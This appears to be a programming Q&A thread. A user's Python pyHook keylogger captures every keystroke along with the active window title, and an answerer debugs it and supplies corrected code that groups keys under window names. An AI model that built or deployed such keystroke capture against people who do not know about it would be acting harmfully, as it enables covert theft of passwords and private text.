# Python - Window Title and keylogger

Tags: python, keylogger

This is a code for a python keylogger and window title grabber but i am not able to grab them at same time.

```
import pythoncom, pyHook ,time

def OnKeyboardEvent(event):
            keylog= chr(event.Ascii)

            print keylog
            key =  event.WindowName
            print key
            time.sleep(0.1)
            if(key==event.WindowName):
                pass
            else:
                key = event.WindowName
                print key

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
```

The output is like

a Start menu
b Start menu
c Start menu
d cmd.exe

and i need it like

Start Menu
abc

cmd.exe
d

Answer (score 1):

Your code doesn't really make any sense. Let's step through what it does:

```
        keylog= chr(event.Ascii)

        print keylog
```

This prints the key pressed.

```
        key =  event.WindowName
        print key
```

This prints the window name. I'm not sure why you're sticking it in a variable called `key` when it's not a key, but that doesn't change what it does.

```
        time.sleep(0.1)
```

This pauses, presumably so you can make sure to miss keys if the user is typing too quickly?

```
        if(key==event.WindowName):
            pass
```

This is always true, because you set `key = event.WindowName` earlier, and the `event` object won't change on the fly.

```
        else:
            key = event.WindowName
            print key
```

This never happens, as explained above. But, if it did, it would set `key` to the value it already has (the window name) and print it again.

My guess is that what you're *trying* to do here is to only print the window name if it's different from last time, or something like that? A quick&dirty way to do that is with a global variable:

```
lastWindow = None

def OnKeyboardEvent(event):
    global lastWindow

    window = event.WindowName
    key = chr(event.Ascii)

    if window != lastWindow:
        print window
        lastWindow = window

    print key
```

So, in your test case, instead of this:

```
a Start menu b Start menu c Start menu d cmd.exe
```

You should get this:

```
Start menu a b c cmd.exe d
```

(Although actually, you're going to get those on separate lines, not space-separated, because your code just does `print keylog` and `print key`, and I did the same. If you want them all on one line, put a comma on the end of each `print` statement.)

Comment: Hello,

Thanks for your reply. Your code helped me a little again what i am getting.


`Start Menu
a
b
c
d`

Now it is making duplicate entries for the windowtitle but now i am some problems

1.  It is making new line for each letter.
2.  Now it is grabbing window title name  only when the key is pressed and i want it to grab window title name after every .1 second.
3. It doesnt check for window title name if the key is not pressed.

Hope you could help me with this.

Thanks